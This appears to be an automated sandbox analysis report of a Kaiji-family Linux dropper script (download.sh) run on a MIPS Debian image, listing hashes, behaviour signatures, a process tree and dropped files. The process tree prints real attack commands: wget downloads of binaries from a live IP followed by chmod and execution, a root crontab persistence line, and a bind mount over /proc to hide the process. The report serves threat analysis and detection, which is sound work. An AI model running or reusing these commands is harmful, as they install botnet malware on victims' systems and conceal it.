Analysis

  • max time kernel
    149s
  • max time network
    147s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240418-en
  • resource tags

    arch:mipsel, image:debian9-mipsel-20240418-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
  • submitted
    16/04/2025, 18:46

General

  • Target
    download.sh
  • Size
    2KB
  • MD5
    544a2f391e2800bac07e883d902bcc75
  • SHA1
    cea67c26c372d03b795bbba678569256385d3b83
  • SHA256
    1dc484d51fb96c2097c2eb3695ff55d641e6778dbe8780cbbd0dbdfa688708ca
  • SHA512
    f281a43fb6443bf15069aee5987d06d493bc0f0f47b927aea17115db168e6bf3271e5f37a0dc7f76defd21b60c24e513fcda0c2f109ce26f5bd4b802de184a4b

Malware Config

Signatures

  • Kaiji (2 IoCs)
    Kaiji payload
  • Kaiji family
  • File and Directory Permissions Modification (1 TTPs, 2 IoCs)
    Adversaries may modify file or directory permissions to evade defenses.
  • Executes dropped EXE (4 IoCs)
  • Creates/modifies Cron job (1 TTPs, 1 IoCs)
    Cron allows running tasks on a schedule, and is commonly used for malware persistence.
  • Changes its process name (1 IoCs)
  • Command and Scripting Interpreter: Unix Shell (1 TTPs, 2 IoCs)
    Execute scripts via Unix Shell.
  • Enumerates kernel/hardware configuration (1 TTPs, 33 IoCs)
    Reads contents of /sys virtual filesystem to enumerate system information.
  • Reads runtime system information (64 IoCs)
    Reads data from /proc virtual filesystem.
  • System Network Configuration Discovery (1 TTPs, 8 IoCs)
    Adversaries may gather information about the network configuration of a system.
  • Writes file to tmp directory (2 IoCs)
    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/download.sh
    /tmp/download.sh
    1⤵
    • Executes dropped EXE
    PID:716
      • /bin/uname
        uname -s
        2⤵
        PID:717
      • /bin/uname
        uname -m
        2⤵
        PID:719
      • /bin/rm
        rm -f linux_mips
        2⤵
        • System Network Configuration Discovery
        PID:720
      • /usr/bin/wget
        wget -t 1 http://154.40.47.248:8000/linux_mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:725
      • /bin/chmod
        chmod +x linux_mips
        2⤵
        • File and Directory Permissions Modification
        PID:761
      • /tmp/linux_mips
        ./linux_mips
        2⤵
        • System Network Configuration Discovery
        PID:762
      • /bin/rm
        rm -f linux_mips
        2⤵
        • System Network Configuration Discovery
        PID:765
      • /bin/rm
        rm -f linux_mipsel
        2⤵
        • System Network Configuration Discovery
        PID:767
      • /usr/bin/wget
        wget -t 1 http://154.40.47.248:8000/linux_mipsel
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:768
      • /bin/chmod
        chmod +x linux_mipsel
        2⤵
        • File and Directory Permissions Modification
        PID:798
      • /tmp/linux_mipsel
        ./linux_mipsel
        2⤵
        • Executes dropped EXE
        • Enumerates kernel/hardware configuration
        • System Network Configuration Discovery
        PID:799
          • /tmp/linux_mipsel
            ./linux_mipsel " "
            3⤵
            • Changes its process name
            • Enumerates kernel/hardware configuration
            • System Network Configuration Discovery
            PID:803
              • /bin/sh
                /bin/sh -c "/etc/32676&"
                4⤵
                • Executes dropped EXE
                • Command and Scripting Interpreter: Unix Shell
                PID:808
              • /usr/sbin/service
                service crond start
                4⤵
                PID:810
                  • /usr/bin/basename
                    basename /usr/sbin/service
                    5⤵
                    PID:811
                  • /usr/bin/basename
                    basename /usr/sbin/service
                    5⤵
                    PID:813
                  • /bin/systemctl
                    systemctl --quiet is-active multi-user.target
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:814
                  • /bin/systemctl
                    systemctl list-unit-files --full "--type=socket"
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:816
                  • /bin/sed
                    sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
                    5⤵
                    PID:817
                  • /bin/systemctl
                    systemctl -p Triggers show dbus.socket
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:818
                  • /bin/systemctl
                    systemctl -p Triggers show ssh.socket
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:819
                  • /bin/systemctl
                    systemctl -p Triggers show syslog.socket
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:820
                  • /bin/systemctl
                    systemctl -p Triggers show systemd-fsckd.socket
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:821
                  • /bin/systemctl
                    systemctl -p Triggers show systemd-initctl.socket
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:822
                  • /bin/systemctl
                    systemctl -p Triggers show systemd-journald-audit.socket
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:823
                  • /bin/systemctl
                    systemctl -p Triggers show systemd-journald-dev-log.socket
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:824
                  • /bin/systemctl
                    systemctl -p Triggers show systemd-journald.socket
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:825
                  • /bin/systemctl
                    systemctl -p Triggers show systemd-networkd.socket
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:826
                  • /bin/systemctl
                    systemctl -p Triggers show systemd-rfkill.socket
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:827
                  • /bin/systemctl
                    systemctl -p Triggers show systemd-udevd-control.socket
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:828
                  • /bin/systemctl
                    systemctl -p Triggers show systemd-udevd-kernel.socket
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:830
              • /usr/local/sbin/systemctl
                systemctl start crond.service
                4⤵
                PID:810
              • /usr/local/bin/systemctl
                systemctl start crond.service
                4⤵
                PID:810
              • /usr/sbin/systemctl
                systemctl start crond.service
                4⤵
                PID:810
              • /usr/bin/systemctl
                systemctl start crond.service
                4⤵
                PID:810
              • /sbin/systemctl
                systemctl start crond.service
                4⤵
                PID:810
              • /bin/systemctl
                systemctl start crond.service
                4⤵
                • Enumerates kernel/hardware configuration
                • Reads runtime system information
                PID:810
              • /bin/sh
                /bin/sh -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"
                4⤵
                • Creates/modifies Cron job
                • Command and Scripting Interpreter: Unix Shell
                PID:834
              • /usr/bin/renice
                renice -20 803
                4⤵
                PID:839
              • /bin/mount
                mount -o bind /tmp/ /proc/803
                4⤵
                PID:840
              • /usr/sbin/service
                service cron start
                4⤵
                PID:841
                  • /usr/bin/basename
                    basename /usr/sbin/service
                    5⤵
                    PID:843
                  • /usr/bin/basename
                    basename /usr/sbin/service
                    5⤵
                    PID:844
                  • /bin/systemctl
                    systemctl --quiet is-active multi-user.target
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:846
                  • /bin/systemctl
                    systemctl list-unit-files --full "--type=socket"
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:848
                  • /bin/sed
                    sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
                    5⤵
                    PID:849
                  • /bin/systemctl
                    systemctl -p Triggers show dbus.socket
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:854
                  • /bin/systemctl
                    systemctl -p Triggers show ssh.socket
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:855
                  • /bin/systemctl
                    systemctl -p Triggers show syslog.socket
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:858
                  • /bin/systemctl
                    systemctl -p Triggers show systemd-fsckd.socket
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:859
                  • /bin/systemctl
                    systemctl -p Triggers show systemd-initctl.socket
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:862
                  • /bin/systemctl
                    systemctl -p Triggers show systemd-journald-audit.socket
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:864
                  • /bin/systemctl
                    systemctl -p Triggers show systemd-journald-dev-log.socket
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:866
                  • /bin/systemctl
                    systemctl -p Triggers show systemd-journald.socket
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:869
                  • /bin/systemctl
                    systemctl -p Triggers show systemd-networkd.socket
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:870
                  • /bin/systemctl
                    systemctl -p Triggers show systemd-rfkill.socket
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:873
                  • /bin/systemctl
                    systemctl -p Triggers show systemd-udevd-control.socket
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:875
                  • /bin/systemctl
                    systemctl -p Triggers show systemd-udevd-kernel.socket
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:877
              • /usr/local/sbin/systemctl
                systemctl start cron.service
                4⤵
                PID:841
              • /usr/local/bin/systemctl
                systemctl start cron.service
                4⤵
                PID:841
              • /usr/sbin/systemctl
                systemctl start cron.service
                4⤵
                PID:841
              • /usr/bin/systemctl
                systemctl start cron.service
                4⤵
                PID:841
              • /sbin/systemctl
                systemctl start cron.service
                4⤵
                PID:841
              • /bin/systemctl
                systemctl start cron.service
                4⤵
                • Enumerates kernel/hardware configuration
                • Reads runtime system information
                PID:841
              • /bin/systemctl
                systemctl start crond.service
                4⤵
                • Enumerates kernel/hardware configuration
                • Reads runtime system information
                PID:880
      • /bin/rm
        /bin/rm /tmp/download.sh
        2⤵
        PID:804
  • /etc/32676
    /etc/32676
    1⤵
    PID:809
      • /bin/sleep
        sleep 60
        2⤵
        PID:812
      • /bin/sleep
        sleep 60
        2⤵
        PID:910
      • /bin/sleep
        sleep 60
        2⤵
        PID:921

Network

MITRE ATT&CK Enterprise v16


Downloads

  • /.mod
    Filesize: 34B
    MD5: f5a3713282e43c200f30342f5ff5e2ea
    SHA1: 2b2ce1a207e2b691a074c6f78f71c4785aae426a
    SHA256: 6ab64e727571458d4884fb2fe82c27c467db0699cb8f648b3f0217c35d2b7511
    SHA512: 5bcb8cd360409147a486755f90e0cdd97183af02ce8de5135b7c6a8a010deb9ef12dcd5ee9a2a8fd2e159347f68e72d6b7fd75e943b4fcd928d7a74b97476013
  • /etc/.walk
    Filesize: 41B
    MD5: b03c65123544e7d4af3d3db728b0c4d4
    SHA1: e32b964efbce48c2817f38e97be344c23b4d48e7
    SHA256: b29e13608838bdb20808aa6aaa14458f4a7484c9784575995d3bcac0e669f2ec
    SHA512: 8cbd864bc70ff26b2b1d0ebde6341daa6df7c6033ec0d1114a74f3fb891a079722e857434f36967d853a8297854d29bec1f16ad1386f6d5148f0a26f9b330861
  • /etc/.walk
    Filesize: 90B
    MD5: 198407eedf6bfd37808428ab3300a90a
    SHA1: 9994b48255824c0d4890ecdb0d2aed2aebb23de3
    SHA256: 4a53e272e3438656c162ca067a2a82f95e90f1c308cad7e3bbb9e8fc054958d1
    SHA512: ffd55d7901a0a9a1416c3999535393179836edc863818422fad3b9781f132d6bee6738221cbe109a87cd5f17d9574fe744fd58bde33bd36bf133a766ef516cb1
  • /etc/32676
    Filesize: 56B
    MD5: 585f408444cbca746945f0cb63f2c3f0
    SHA1: 0e44bae17174f04514e770ca7fc4bec1007e39cd
    SHA256: ebb961c647363dfa90f302de378e0e61807b9b792fc86616635a713cca8f4299
    SHA512: 022241dbafad55164701f67ef5b84154e3af97c5dfe77dee7bf8406f2befbd2962bbf4f243432b2f41d6c2376b87fcf551fd6945e03ddb02a5619c2f0f69c596
  • /etc/profile.d/gateway.sh
    Filesize: 913B
    MD5: 1bc5e4de95c269b22485334c81253569
    SHA1: 8c421ecfdb8d090037226adc45f45de8c847f629
    SHA256: 2c6b57cdf813103c6e1db4e970c94378c2eaa362d94f3525afc3afb7249997b0
    SHA512: d46c0af72a1663fa64f87f8ca891e2b5463b6219939125a0f2a89b9c13413733fa5171c5cf04dcaf346d88e468d44f0fc31af26e32b901dad5a4aa0462553416
  • /tmp/linux_mips
    Filesize: 2.2MB
    MD5: 5ec2f6c412ccfcc16781a7f3f37fb474
    SHA1: 912cb18493577a0b5c64d994f4b6bc05990ae390
    SHA256: e58dffab271cd20cb6089017017d8e6c5f68c56c2b1877e8a94bbcdadcd4ef4c
    SHA512: ce37675e1ccfd0e7fdf2fe155473d94222ceb28cf8a3c797033617a07e7ce632240bdbb338d7c3aec5131a343d172a4d58a05e2558408e42b3eb80cf1767857f
  • /tmp/linux_mipsel
    Filesize: 2.2MB
    MD5: 06a141032d508ea7639d82c044851727
    SHA1: e49bf29f0c21f0e5a5d0ccee733ed1626df57d6b
    SHA256: d3030e1575b48293f9364353127bd44892ec65120c11d1710eead510373aab55
    SHA512: 8173fc77c9ba84dc1a980c907dec6d2a37e20b3dec5438189fb1990e6c161de5a7ebc033091be2bcd7b80fb1bfe1478eb9f81f6811c9417fd95d3419c9cc2e05
  • /usr/bin/include/find
    Filesize: 240KB
    MD5: bb4edcad76062a76284c69f5fe4e50ea
    SHA1: 86055be4ce94fa3cffa9924e7b511e95df636606
    SHA256: b7e25e128c130473f33c5135c78f591f35d7c4a7c5e1246c12eaa298db453474
    SHA512: 254acc62d2f83f5a4686adcf3fe6ad4697f392c288c5baa323830bb6f2466c303fd7bc9f237e98b2ca76bc3abb6b4c264e042be8c4291ae5cc21b2189d996521